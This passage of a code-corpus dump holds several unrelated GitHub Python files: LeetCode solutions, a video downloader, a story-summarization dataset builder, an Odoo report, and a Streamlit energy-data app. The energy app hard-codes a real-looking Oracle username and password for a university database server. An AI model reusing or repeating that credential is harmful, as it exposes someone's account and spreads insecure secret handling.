type=int,\n default=10000,\n metavar=\"N\",\n help=\"input batch size for testing (default: 10000)\",\n )\n parser.add_argument(\n \"--lr\",\n type=float,\n default=0.005,\n metavar=\"LR\",\n help=\"learning rate (default: 0.005)\",\n )\n parser.add_argument(\n \"--n_iter\",\n type=int,\n default=80000,\n metavar=\"N\",\n help=\"number of iteration to train (default: 80000)\",\n )\n parser.add_argument(\n \"--record_freq\",\n type=int,\n default=1000,\n metavar=\"N\",\n help=\"recording frequency (default: 1000)\",\n )\n parser.add_argument(\n \"--n_layer\",\n type=int,\n default=1,\n metavar=\"N\",\n help=\"number of MLP layer (default: 1)\",\n )\n parser.add_argument(\n \"--n_hidden\",\n type=int,\n default=200,\n metavar=\"N\",\n help=\"number of hidden neuron (default: 200)\",\n )\n parser.add_argument(\n \"--no_cuda\", action=\"store_true\", default=False, help=\"disables CUDA training\"\n )\n parser.add_argument(\n \"--seed\", type=int, default=0, metavar=\"S\", help=\"random seed (default: 0)\"\n )\n\n opt = parser.parse_args()\n use_cuda = not opt.no_cuda and torch.cuda.is_available()\n opt.device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n main(opt)\n","repo_name":"kdkyum/odd_neep","sub_path":"main_ubs.py","file_name":"main_ubs.py","file_ext":"py","file_size_in_byte":10304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72565489794","text":"'''\n\nDescription:\n\nSerialization is the process of converting a data structure or object into a sequence of bits so that it can be stored in a file or memory buffer, or transmitted across a network connection link to be reconstructed later in the same or another computer environment.\n\nDesign an algorithm to serialize and deserialize a binary tree. There is no restriction on how your serialization/deserialization algorithm should work. You just need to ensure that a binary tree can be serialized to a string and this string can be deserialized to the original tree structure.\n\nExample: \n\nYou may serialize the following tree:\n\n 1\n / \\\n 2 3\n / \\\n 4 5\n\nas \"[1,2,3,null,null,4,5]\"\nClarification: The above format is the same as how LeetCode serializes a binary tree. You do not necessarily need to follow this format, so please be creative and come up with different approaches yourself.\n\nNote: Do not use class member/global/static variables to store states. Your serialize and deserialize algorithms should be stateless.\n\n'''\n\n\n\n# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nfrom collections import deque\n\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string.\n \n :type root: TreeNode\n :rtype: str\n \"\"\"\n \n path_of_preorder = []\n \n def encoder( node: TreeNode):\n \n if node:\n \n path_of_preorder.append( node.val )\n \n encoder( node.left )\n encoder( node.right )\n\n else:\n \n path_of_preorder.append( '3.14' )\n \n # ------------------------------------------------\n encoder( root )\n \n codec = '#'.join( map( str, path_of_preorder ) )\n \n return codec\n \n\n \n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree.\n \n :type data: str\n :rtype: TreeNode\n \"\"\"\n \n path_of_preorder = deque( float(value) for value in data.split('#') )\n \n def decoder():\n \n if path_of_preorder:\n \n value = path_of_preorder.popleft()\n \n if value != 3.14:\n \n cur_node = TreeNode( int(value) )\n\n cur_node.left = decoder()\n cur_node.right = decoder()\n \n return cur_node\n \n else:\n \n return None\n # -----------------------------------\n return decoder()\n\n\n\n# n : the number of node in binary tree\n\n## Time Complexity: O( n )\n#\n# The overhead in time is the cost of preorder traversal, which is of O( n ).\n\n## Space Complexity: O( n )\n#\n# The overhead in space is the cost of recursion call stack, which is of O( n ).\n\n\ndef in_order( node ):\n\n if node:\n\n in_order( node.left )\n print( node.val, end = ' ')\n in_order( node.right )\n\n\ndef test_bench():\n\n root_1 = TreeNode( 1 )\n \n root_1.left = TreeNode( 2 )\n root_1.right = TreeNode( 3 )\n\n root_1.right.left = TreeNode( 4 )\n root_1.right.right = TreeNode( 5 )\n\n\n # expected output:\n '''\n before :\n 2 1 4 3 5\n after :\n 2 1 4 3 5\n '''\n\n # Before serialization and deserialization:\n print(\" before : \")\n in_order( root_1 )\n \n serialization = Codec().serialize( root_1 ) \n root_of_tree = Codec().deserialize( serialization )\n print(\"\\n after : \")\n # After serialization and deserialization:\n in_order( root_of_tree )\n\n return\n\n\n\nif __name__ == '__main__':\n\n test_bench()","repo_name":"brianchiang-tw/leetcode","sub_path":"No_0297_Serialize and Deserialize Binary Tree/by_preorder.py","file_name":"by_preorder.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"61"} +{"seq_id":"72449929794","text":"from config import videos_urls\nimport requests\n\nfor video_url in videos_urls:\n r = requests.get(video_url, stream=True)\n file_name = r.headers.get('Content-Disposition').split(\"inline; filename=\\\"\")[1][:-1]\n total_size = r.headers.get('content-length')\n print(file_name)\n with open(file_name, 'wb') as f:\n downloaded_chunks = 0\n for chunk in r.iter_content(chunk_size=1024 * 1024):\n if chunk:\n f.write(chunk)\n downloaded_chunks += len(chunk)\n print(end='\\r')\n print(f'{int((downloaded_chunks / int(total_size)) * 100)}%', end='')\n print(end='\\r')\n print(\"Downloaded\")","repo_name":"code-with-me1312/Download-files-from-web","sub_path":"downloadVideos.py","file_name":"downloadVideos.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10476228114","text":"#!/usr/bin/env python\n\nimport os, django\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"Collecster.settings\")\ndjango.setup()\n\nimport json\n\nfrom advideogame.configuration import ConfigNature\n\nnature_dict = {}\nfor nature in ConfigNature.DATA:\n print (\"Nature: {}\".format(nature))\n nature_dict[nature] = [\"ConceptSpecific.{}\".format(Specific.__name__) for Specific in ConfigNature.get_concept_specifics((nature,))]\n\nwith open(\"concept_specifics_table.py\", \"w\") as f:\n f.write(\"concept_specifics_table = {}\".format(json.dumps(nature_dict, sort_keys=True, indent=4)))\n","repo_name":"Adnn/Collecster_OLD","sub_path":"collecster_import_v1/dumpers/list_target_specific.py","file_name":"list_target_specific.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2347919609","text":"# -*- coding: utf-8 -*-\n\ndef main():\n n=int(input(\"请输入一个正整数:\"))\n cut=0\n ls=[]\n while(n):\n x=n%10\n ls.append(x)\n n//=10\n cut+=1\n ls=ls[::-1]\n print((ls,cut))\n\nif __name__==\"__main__\":\n main()","repo_name":"fibonacciyys/mypy","sub_path":"pylearn/example_100/29.py","file_name":"29.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12995582579","text":"import argparse\nimport json\nimport sys\nimport random\nimport os\nimport torch\nimport ftfy\nimport re\nfrom datasets import load_dataset\nfrom tqdm import tqdm\nfrom tqdm.contrib import tenumerate\nfrom transformers import AutoTokenizer, AutoModelForCausalLM, BitsAndBytesConfig\n\ntorch.backends.cuda.matmul.allow_tf32 = True\n\n\nclass StorySummarizer():\n _SUMMARY_PROMPT = \"\\n\\n### SUMMARY:\\n\"\n _ANALYSIS_PROMPT = \"\\n\\n### ANALYSIS:\\n\"\n\n def __init__(self, model_name_or_path, penalty_alpha, top_k, max_new_tokens, load_in_4bit):\n self.tokenizer = AutoTokenizer.from_pretrained(model_name_or_path)\n\n nf4_config = BitsAndBytesConfig(\n load_in_4bit=True,\n bnb_4bit_quant_type=\"nf4\",\n bnb_4bit_use_double_quant=True,\n bnb_4bit_compute_dtype=torch.bfloat16\n )\n\n self.model = AutoModelForCausalLM.from_pretrained(\n model_name_or_path, trust_remote_code=True,\n torch_dtype=None if load_in_4bit else torch.bfloat16,\n quantization_config=nf4_config if load_in_4bit else None, device_map=\"auto\"\n )\n\n self._inference_params = {\n \"penalty_alpha\": penalty_alpha,\n \"top_k\": top_k,\n \"max_new_tokens\": max_new_tokens,\n \"eos_token_id\": self.tokenizer.eos_token_id,\n \"pad_token_id\": self.tokenizer.eos_token_id,\n }\n\n def set_inference_params(self, params):\n if \"max_length\" in params:\n params[\"max_new_tokens\"] = params[\"max_length\"]\n del params[\"max_length\"]\n self._inference_params.update(params)\n\n def summarize(self, input_text):\n return self._run(input_text, self._SUMMARY_PROMPT)\n\n def analyze(self, input_text):\n return self._run(input_text, self._ANALYSIS_PROMPT)\n\n def _run(self, input_text, prompt):\n input_text += prompt\n input_ids = self.tokenizer(\n input_text, return_tensors=\"pt\").input_ids.to(\"cuda\")\n outputs = self.model.generate(input_ids, **self._inference_params)\n answer = self.tokenizer.decode(outputs[0], skip_special_tokens=True)\n loc = answer.find(prompt)\n answer = answer[loc + len(prompt):]\n return answer\n\n# from https://github.com/neonbjb/tortoise-tts/blob/main/tortoise/utils/text.py\n\n\ndef split_and_recombine_text(text, desired_length=200, max_length=300):\n \"\"\"Split text it into chunks of a desired length trying to keep sentences intact.\"\"\"\n # normalize text, remove redundant whitespace and convert non-ascii quotes to ascii\n text = re.sub(r'\\n\\n+', '\\n', text)\n text = re.sub(r'\\s+', ' ', text)\n text = re.sub(r'[“”]', '\"', text)\n\n rv = []\n in_quote = False\n current = \"\"\n split_pos = []\n pos = -1\n end_pos = len(text) - 1\n\n def seek(delta):\n nonlocal pos, in_quote, current\n is_neg = delta < 0\n for _ in range(abs(delta)):\n if is_neg:\n pos -= 1\n current = current[:-1]\n else:\n pos += 1\n current += text[pos]\n if text[pos] == '\"':\n in_quote = not in_quote\n return text[pos]\n\n def peek(delta):\n p = pos + delta\n return text[p] if p < end_pos and p >= 0 else \"\"\n\n def commit():\n nonlocal rv, current, split_pos\n rv.append(current)\n current = \"\"\n split_pos = []\n\n while pos < end_pos:\n c = seek(1)\n # do we need to force a split?\n if len(current) >= max_length:\n if len(split_pos) > 0 and len(current) > (desired_length / 2):\n # we have at least one sentence and we are over half the desired length, seek back to the last split\n d = pos - split_pos[-1]\n seek(-d)\n else:\n # no full sentences, seek back until we are not in the middle of a word and split there\n while c not in '!?.\\n ' and pos > 0 and len(current) > desired_length:\n c = seek(-1)\n commit()\n # check for sentence boundaries\n elif not in_quote and (c in '!?\\n' or (c == '.' and peek(1) in '\\n ')):\n # seek forward if we have consecutive boundary markers but still within the max length\n while pos < len(text) - 1 and len(current) < max_length and peek(1) in '!?.':\n c = seek(1)\n split_pos.append(pos)\n if len(current) >= desired_length:\n commit()\n # treat end of quote as a boundary if its followed by a space or newline\n elif in_quote and peek(1) == '\"' and peek(2) in '\\n ':\n seek(2)\n split_pos.append(pos)\n rv.append(current)\n\n # clean up, remove lines with only whitespace or punctuation\n rv = [s.strip() for s in rv]\n rv = [s for s in rv if len(s) > 0 and not re.match(r'^[\\s\\.,;:!?]*$', s)]\n\n return rv\n\n\ndef main(args):\n dataset = load_dataset(args.dataset)[\"train\"]\n\n ids = dataset[\"id\"]\n\n if args.chunks > 1:\n if args.validation_split != 0 or args.test_split != 0:\n print(\"Note, validation/test splits will not be chunked\")\n\n index = {id: index for (index, id) in enumerate(ids)}\n\n if args.shard is not None:\n parts = args.shard.split(\",\")\n this_shard = int(parts[0])\n num_shards = int(parts[1])\n assert args.chunks == 1\n assert num_shards > 1\n assert this_shard >= 0 and this_shard < num_shards\n\n ids = [ids[i]\n for i in range(0, len(ids)) if (i % num_shards) == this_shard]\n\n tokenizer = AutoTokenizer.from_pretrained(\n args.stats_for_tokenizer) if args.stats_for_tokenizer is not None else None\n tokenizer_stats = {\n \"num_text_tokens\": [],\n \"num_summary_tokens\": [],\n \"num_text_and_summary_tokens\": []\n }\n\n summarizer = StorySummarizer(\n args.summarizer, args.penalty_alpha, args.top_k, args.summary_max_tokens, args.load_in_4bit) if not args.no_summary else None\n\n data = []\n for id in tqdm(ids, desc=\"Books\"):\n\n i = index[id]\n entry = dataset[i]\n title: str = entry[\"title\"]\n author: str = entry[\"author\"]\n utf8: str = entry[\"utf8\"]\n\n if not args.no_ftfy:\n utf8 = ftfy.fix_text(utf8)\n\n passages = split_and_recombine_text(\n utf8, args.passage_desired_len, args.passage_max_len)\n\n for i, passage in tenumerate(passages, desc=f\"Passages (Title=\\\"{title}\\\", Author=\\\"{author}\\\")\", leave=False):\n\n summary = summarizer.summarize(passage).strip().replace(\"\\n\", \"\") if not args.no_summary else \"\"\n\n if tokenizer is not None:\n text_tokens = len(tokenizer.encode(\n passage, add_special_tokens=False))\n summary_tokens = len(tokenizer.encode(\n summary, add_special_tokens=False))\n tokenizer_stats[\"num_text_tokens\"].append(text_tokens)\n tokenizer_stats[\"num_summary_tokens\"].append(summary_tokens)\n tokenizer_stats[\"num_text_and_summary_tokens\"].append(\n text_tokens + summary_tokens)\n \n data.append(json.dumps({\n \"passage\": passage,\n \"summary\": summary,\n \"title\": title,\n \"author\": author,\n \"id\": id,\n \"passage_index\": i\n }))\n\n validation_size = int(len(data) * args.validation_split)\n test_size = int(len(data) * args.test_split)\n\n validation = data[0:validation_size]\n test = data[validation_size: test_size + validation_size]\n train = data[test_size + validation_size:]\n\n print(f\"# Train: {len(train)}\")\n if validation_size > 0:\n print(f\"# Valid: {validation_size}\")\n if test_size > 0:\n print(f\"# Valid: {test_size}\")\n\n output_name = f\"{args.dataset.split('/')[1]}-summarized\"\n\n output_dir = os.path.join(args.output_dir, output_name, \"data\")\n os.makedirs(output_dir, exist_ok=True)\n\n shard_suffix = f\"-{this_shard+1:05}\" if args.shard is not None else \"\"\n if args.chunks <= 1:\n open(os.path.join(output_dir, f\"train{shard_suffix}.jsonl\"),\n \"w\", encoding=\"utf-8\").writelines(train)\n else:\n chunk_size = int(len(train) / args.chunks)\n if (len(train) % args.chunks) != 0:\n chunk_size += 1\n train = [train[i:i + chunk_size]\n for i in range(0, len(train), chunk_size)]\n for i in range(0, len(train)):\n open(os.path.join(output_dir, f\"train-{i+1:05}.jsonl\"),\n \"w\", encoding=\"utf-8\").writelines(train[i])\n if len(validation) > 0:\n open(os.path.join(output_dir, f\"valid{shard_suffix}.jsonl\"),\n \"w\", encoding=\"utf-8\").writelines(validation)\n if len(test) > 0:\n open(os.path.join(output_dir, f\"test{shard_suffix}.jsonl\"),\n \"w\", encoding=\"utf-8\").writelines(test)\n\n if tokenizer is not None:\n import numpy\n for key, value in tokenizer_stats.items():\n print(f\"{key}: min: {numpy.min(value)} max: {numpy.max(value)} avg: {int(numpy.average(value))} med: {int(numpy.median(value))} total: {numpy.sum(value)}\")\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--dataset\", type=str)\n\n parser.add_argument(\"--stats_for_tokenizer\", type=str)\n parser.add_argument(\"--stats_only\", type=str)\n\n parser.add_argument(\"--summarizer\", type=str,\n default=\"emozilla/mpt-7b-storysummarizer\")\n parser.add_argument(\"--penalty_alpha\", type=float, default=0.6)\n parser.add_argument(\"--top_k\", type=int, default=4)\n parser.add_argument(\"--load_in_4bit\", action=\"store_true\")\n parser.add_argument(\"--summary_max_tokens\", type=int, default=128)\n parser.add_argument(\"--no_summary\", action=\"store_true\")\n\n parser.add_argument(\"--no_ftfy\", action=\"store_true\")\n parser.add_argument(\"--passage_desired_len\", type=int, default=1500)\n parser.add_argument(\"--passage_max_len\", type=int, default=2000)\n\n parser.add_argument(\"--output_dir\", type=str, default=\"outputs\")\n parser.add_argument(\"--validation_split\", type=float, default=0)\n parser.add_argument(\"--test_split\", type=float, default=0)\n parser.add_argument(\"--chunks\", type=int, default=1)\n parser.add_argument(\"--shard\", type=str)\n\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n sys.exit(main(parse_args()))\n","repo_name":"jquesnelle/ghostwriter","sub_path":"create-summary-dataset.py","file_name":"create-summary-dataset.py","file_ext":"py","file_size_in_byte":10488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70911887553","text":"from odoo.osv import osv\nfrom odoo.report import report_sxw\nfrom datetime import datetime\n\n\nclass AccountAssetDetails(report_sxw.rml_parse):\n\n def __init__(self, cr, uid, name, context):\n super(AccountAssetDetails, self).__init__(cr, uid, name, context=context)\n\n self.localcontext.update({\n 'get_details': self.get_details,\n\n })\n self.context = context\n\n def format_date(self, date):\n date_dt = datetime.strptime(date, '%Y-%m-%d')\n return date_dt.strftime(\"%d\").upper()+\" \"+date_dt.strftime(\"%b\").upper()+\", \"+str(date_dt.year)\n\n def get_details(self, asset_id):\n result = {\n 'image': asset_id.image,\n 'name': asset_id.name,\n 'sys_no': asset_id.sys_no,\n 'code': asset_id.code,\n 'serial_no': asset_id.serial_no,\n 'vendor': asset_id.vendor,\n 'depreciation_base': asset_id.depreciation_base,\n 'value_residual': asset_id.value_residual,\n 'purchase_value': asset_id.purchase_value,\n 'salvage_value': asset_id.salvage_value,\n 'acquired_date': self.format_date(asset_id.acquired_date),\n 'date_start': self.format_date(asset_id.date_start),\n 'profile': asset_id.profile_id.name,\n 'sub_category': asset_id.sub_category_id.name,\n 'location': asset_id.location_id.name,\n 'asset_department': asset_id.asset_department_id.name,\n 'asset_unit': asset_id.asset_unit_id.name,\n 'partner': asset_id.partner_id.name,\n 'method_number': asset_id.method_number,\n 'method_number_month': asset_id.method_number_month,\n 'asset_gl_account': asset_id.asset_gl_account_id.code,\n 'depreciation_expense_account': asset_id.depreciation_expense_account_id.code,\n 'accumulated_depreciation_account': asset_id.accumulated_depreciation_account_id.code,\n }\n\n return result\n\n\nclass WrappedReportAureolNassitReport(osv.AbstractModel):\n _name = 'report.account_asset_management.asset_details_report_template'\n _inherit = 'report.abstract_report'\n _template = 'account_asset_management.asset_details_report_template'\n _wrapped_report_class = AccountAssetDetails\n","repo_name":"Jacky-odoo/Ecobank","sub_path":"custom/asset/account_asset_management/report/asset_details_report.py","file_name":"asset_details_report.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28207941523","text":"\"\"\" This module contains the classes related to the outcome of a scan \"\"\"\nfrom ..plugin import Plugin\nfrom uuid import uuid4\nimport json\n\nclass Scan():\n def __init__(self, sample, scanner, uuid=None, pending=False, scan_id=None, scan_results=[]):\n self.pending = pending\n self.sample = sample\n self.uuid = uuid if uuid is not None else uuid4() # uuid for scan\n self.scanner = scanner\n self.scan_results = scan_results\n self.scan_id = scan_id # unique id to retrieve from scanner\n\n def put(self):\n return self.project.db.put_scan(self)\n\n def add_result(self, scan_result):\n self.scan_results.append(scan_result)\n self.project.db.put_scan_result(self, scan_result)\n\n def __str__(self):\n return str(self.uuid)\n\n def to_dict(scan):\n return {'pending': scan.pending,\n 'sample': scan.sample.sha256,\n 'scanner': scan.scanner,\n 'scan_id': scan.scan_id,\n 'uuid': scan.uuid,\n 'scan_results': [s.uuid for s in scan.scan_results]}\n\nclass ScanResult():\n \"\"\" this class represents a single scan for an AV, on a specific sample, at a given time, extra must be serializable...\"\"\"\n\n def __init__(self, sample, scanner, scan, av, label, update, version, uuid=None):\n self.uuid = uuid if uuid else uuid4()\n self.scan = scan\n self.scanner = scanner\n self.label = label\n self.sample = sample\n self.av = av\n","repo_name":"necst/crave","sub_path":"crave/scanner/scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"61"} +{"seq_id":"41179320585","text":"# imports\r\nimport streamlit as st\r\nimport cx_Oracle\r\nfrom Energy_reliability import *\r\nfrom Energy_CO2 import *\r\nfrom Energy_fuel import *\r\nfrom Energy_sales import *\r\nfrom Energy_reliability import *\r\nfrom PIL import Image\r\n\r\n# vars\r\nstates = [\"\"\"\"\"\", \"\"\"AL\"\"\", \"\"\"AK\"\"\", \"\"\"AZ\"\"\", \"\"\"AR\"\"\", \"\"\"CA\"\"\", \"\"\"CO\"\"\", \"\"\"CT\"\"\", \"\"\"DE\"\"\", \"\"\"FL\"\"\", \"\"\"GA\"\"\",\r\n \"\"\"HI\"\"\", \"\"\"ID\"\"\", \"\"\"IL\"\"\", \"\"\"IN\"\"\", \"\"\"IA\"\"\", \"\"\"KS\"\"\", \"\"\"KY\"\"\", \"\"\"LA\"\"\", \"\"\"ME\"\"\", \"\"\"MD\"\"\", \"\"\"MA\"\"\",\r\n \"\"\"MI\"\"\", \"\"\"MN\"\"\", \"\"\"MS\"\"\", \"\"\"MO\"\"\", \"\"\"MT\"\"\", \"\"\"NE\"\"\", \"\"\"NV\"\"\", \"\"\"NH\"\"\", \"\"\"NJ\"\"\", \"\"\"NM\"\"\", \"\"\"NY\"\"\",\r\n \"\"\"NC\"\"\", \"\"\"ND\"\"\", \"\"\"OH\"\"\", \"\"\"OK\"\"\", \"\"\"OR\"\"\", \"\"\"PA\"\"\", \"\"\"RI\"\"\", \"\"\"SC\"\"\", \"\"\"SD\"\"\", \"\"\"TN\"\"\", \"\"\"TX\"\"\",\r\n \"\"\"UT\"\"\", \"\"\"VT\"\"\", \"\"\"VA\"\"\", \"\"\"WA\"\"\", \"\"\"WV\"\"\", \"\"\"WI\"\"\", \"\"\"WY\"\"\"]\r\n\r\n# Oracle connection\r\ndsn = cx_Oracle.makedsn(\"oracle.cise.ufl.edu\", 1521, service_name=\"orcl\")\r\nuserpwd = \"ApexLegend2020\"\r\n\r\n#################\r\n# Functions\r\n#################\r\ndef getFuelTrendCall():\r\n # initialize\r\n connection = cx_Oracle.connect(\"vprater\", userpwd, dsn, encoding=\"UTF-8\")\r\n\r\n # display\r\n fuelTypes = st.multiselect('Select Fuel Type',\r\n ('Solar', 'Geothermal', 'Coal', 'Natural Gas', 'Nuclear', 'Wind'), 'Solar')\r\n # if st.button('Get Fuel Trends'):\r\n st.subheader('Number of Utilities that use a Given Fuel Exclusively')\r\n if len(fuelTypes) >= 1:\r\n (chart, query) = getFuelTrend(connection, fuelTypes)\r\n st.altair_chart(chart)\r\n st.code(query, language='sql')\r\n\r\n # cleanup\r\n connection.close()\r\n\r\n\r\ndef displayCO2Call():\r\n #initialize\r\n connection = cx_Oracle.connect(\"vprater\", userpwd, dsn, encoding=\"UTF-8\")\r\n\r\n # display\r\n st.subheader('Best/Worst CO2 Emissions Net Change')\r\n # QUERY FOR CO2 for five best and five worst over one year\r\n display_order = st.selectbox(\"\", ('Five best states', 'Five worst states'))\r\n if display_order == 'Five best states':\r\n setChart = \"\"\"asc\"\"\"\r\n elif display_order == 'Five worst states':\r\n setChart = \"\"\"desc\"\"\"\r\n\r\n year_select = st.selectbox('Comparison- Year Start:', ('2013', '2014', '2015', '2016', '2017'))\r\n year_select2 = st.selectbox('Comparison- Year End:', ('2014', '2015', '2016', '2017', '2018'))\r\n # show all years\r\n chartone = displayCO2(connection, setChart, int(year_select),int(year_select2), True)\r\n # show time selected\r\n charttwo = displayCO2(connection, setChart, int(year_select),int(year_select2), False)\r\n st.altair_chart(chartone)\r\n st.altair_chart(charttwo)\r\n\r\n # cleanup\r\n connection.close()\r\n\r\n\r\ndef displayCO2byStateCall():\r\n # initialize\r\n connection = cx_Oracle.connect(\"vprater\", userpwd, dsn, encoding=\"UTF-8\")\r\n\r\n # display\r\n st.subheader('State CO2 Emissions Comparison Tool')\r\n # QUERY FOR CO2 by state\r\n\r\n st.markdown('**Select Year Range**')\r\n stateCO2_start_year = st.selectbox('Start Year', ('2013', '2014', '2015', '2016', '2017'))\r\n stateCO2_end_year = st.selectbox('End Year', ('2014', '2015', '2016', '2017', '2018'), 4)\r\n st.markdown('**Select States to Compare**')\r\n stateCO2_state1 = st.selectbox('State 1', states, 1)\r\n stateCO2_state2 = st.selectbox('State 2', states)\r\n stateCO2_state3 = st.selectbox('State 3', states)\r\n stateCO2_state4 = st.selectbox('State 4', states)\r\n stateCO2_state5 = st.selectbox('State 5', states)\r\n\r\n chartone = displayCO2byState(connection, stateCO2_start_year, stateCO2_end_year,\r\n stateCO2_state1, stateCO2_state2, stateCO2_state3,\r\n stateCO2_state4, stateCO2_state5)\r\n\r\n charttwo = displayNormalizedCO2(connection, stateCO2_start_year, stateCO2_end_year,\r\n stateCO2_state1, stateCO2_state2, stateCO2_state3,\r\n stateCO2_state4, stateCO2_state5)\r\n\r\n\r\n st.markdown('**Gross Tons CO2 Produced**')\r\n st.altair_chart(chartone)\r\n st.markdown('**Normalized Lbs CO2 Produced**')\r\n st.altair_chart(charttwo)\r\n\r\n map_year = st.selectbox('Select Year for CO2 Map', ('2013', '2014', '2015', '2016', '2017', '2018'))\r\n st.markdown('**Normalized Lbs CO2 Produced Choropleth Map**')\r\n chartthree = makeMeAFreakingMap(connection, map_year)\r\n st.altair_chart(chartthree)\r\n\r\n # cleanup\r\n connection.close()\r\n\r\n\r\ndef displayReliabilityCall():\r\n # initialize\r\n connection = cx_Oracle.connect(\"vprater\", userpwd, dsn, encoding=\"UTF-8\")\r\n\r\n # display\r\n st.subheader('Outage Trends (With and Without Major Events)')\r\n chart = displayReliability(connection)\r\n st.altair_chart(chart)\r\n\r\n # cleanup\r\n connection.close()\r\n\r\n\r\ndef displaySalesCall():\r\n # initialize\r\n connection = cx_Oracle.connect(\"vprater\", userpwd, dsn, encoding=\"UTF-8\")\r\n\r\n # display\r\n st.subheader('Residential Power Revenue per County')\r\n chart = displaySales(connection)\r\n st.altair_chart(chart)\r\n\r\n # cleanup\r\n connection.close()\r\n\r\n\r\n#######################\r\n# Sidebar menu#\r\n#######################\r\n# imports\r\n\r\n# Streamlit Display\r\nst.title = 'Energy Industry'\r\nimage = Image.open('database_project_banner.jpg')\r\nst.image(image, use_column_width=True)\r\n\r\n# functions\r\nfunctionDict = {\r\n 'Fuel Utilization': getFuelTrendCall,\r\n 'CO2 Change': displayCO2Call,\r\n 'CO2 State Comparison': displayCO2byStateCall,\r\n 'Grid Reliability': displayReliabilityCall,\r\n 'Sales': displaySalesCall\r\n}\r\nmenu = st.sidebar.radio('Pick a topic', ('Fuel Utilization', 'CO2 Change', 'CO2 State Comparison', 'Grid Reliability','Sales'))\r\n\r\nfunctionCall = functionDict[menu]\r\nfunctionCall()\r\n","repo_name":"mindcodemediator/Database_Energy_Project","sub_path":"Energy_Industry.py","file_name":"Energy_Industry.py","file_ext":"py","file_size_in_byte":5677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24602615156","text":"#!/usr/bin/env python\n\"\"\"Gets the IP for a given hostname.\"\"\"\n\nimport sys\nimport argparse\nimport socket\n# ==============================================================================\n__version__ = \"0.1\"\n\n__copyright__ = \"Copyright 2017, devops.center\"\n__credits__ = [\"Bob Lozano\", \"Gregg Jensen\"]\n__license__ = ' \\\n # Copyright 2014-2017 devops.center llc \\\n # \\\n # Licensed under the Apache License, Version 2.0 (the \"License\"); \\\n # you may not use this file except in compliance with the License. \\\n # You may obtain a copy of the License at \\\n # \\\n # http://www.apache.org/licenses/LICENSE-2.0 \\\n # \\\n # Unless required by applicable law or agreed to in writing, software \\\n # distributed under the License is distributed on an \"AS IS\" BASIS, \\\n # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. \\\n # See the License for the specific language governing permissions and \\\n # limitations under the License. \\\n # '\n__status__ = \"Development\"\n# ==============================================================================\n\n\ndef checkArgs():\n \"\"\"Check the command line arguments.\"\"\"\n parser = argparse.ArgumentParser(\n description=('Gets the IP for the given hostname'))\n parser.add_argument('-n', '--nameOfHost', help='The fully qualified '\n 'name and domain of the host that you want the '\n 'IP for.',\n required=True)\n\n args = parser.parse_args()\n\n retHostname = None\n if args.nameOfHost:\n retHostname = args.nameOfHost\n\n return(retHostname)\n\n\ndef main(argv):\n \"\"\"Main code goes here.\"\"\"\n theHostname = checkArgs()\n\n try:\n ipReturned = socket.gethostbyname(theHostname)\n print(ipReturned)\n except socket.gaierror:\n print(\"ERROR\")\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n\n# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4\n","repo_name":"devopscenter/dcUtils","sub_path":"checkDNSforIP.py","file_name":"checkDNSforIP.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"9106103509","text":"import tensorflow as tf\n\n\ndef distance_from_prob(y_true, y_pred):\n \"\"\"Get keypoint distance from heatmap probability.\n \"\"\"\n height, width = y_pred.get_shape()[1:3]\n\n index_map_x = tf.range(width, dtype=y_true.dtype)\n index_map_x = tf.reshape(index_map_x, (1, 1, -1, 1))\n index_map_y = tf.range(height, dtype=y_true.dtype)\n index_map_y = tf.reshape(index_map_y, (1, -1, 1, 1))\n\n y_true_map_x = y_true*index_map_x\n y_true_map_y = y_true*index_map_y\n y_pred_map_x = y_pred*index_map_x\n y_pred_map_y = y_pred*index_map_y\n\n y_true_x = tf.reduce_sum(y_true_map_x, axis=(1, 2))\n y_true_y = tf.reduce_sum(y_true_map_y, axis=(1, 2))\n y_pred_x = tf.reduce_sum(y_pred_map_x, axis=(1, 2))\n y_pred_y = tf.reduce_sum(y_pred_map_y, axis=(1, 2))\n\n dist = tf.math.sqrt(\n (y_true_x - y_pred_x)**2 + (y_true_y - y_pred_y)**2)\n\n dist = tf.reduce_mean(dist, axis=-1)\n\n return dist\n","repo_name":"samson6460/tf2_pose_estimation","sub_path":"metrics/distance_metrics.py","file_name":"distance_metrics.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"26088068065","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def rotateRight(self, head: Optional[ListNode], k: int) -> Optional[ListNode]:\n if not head:\n return head\n n = 0\n curr = head\n prev = ListNode()\n while curr:\n prev = curr\n 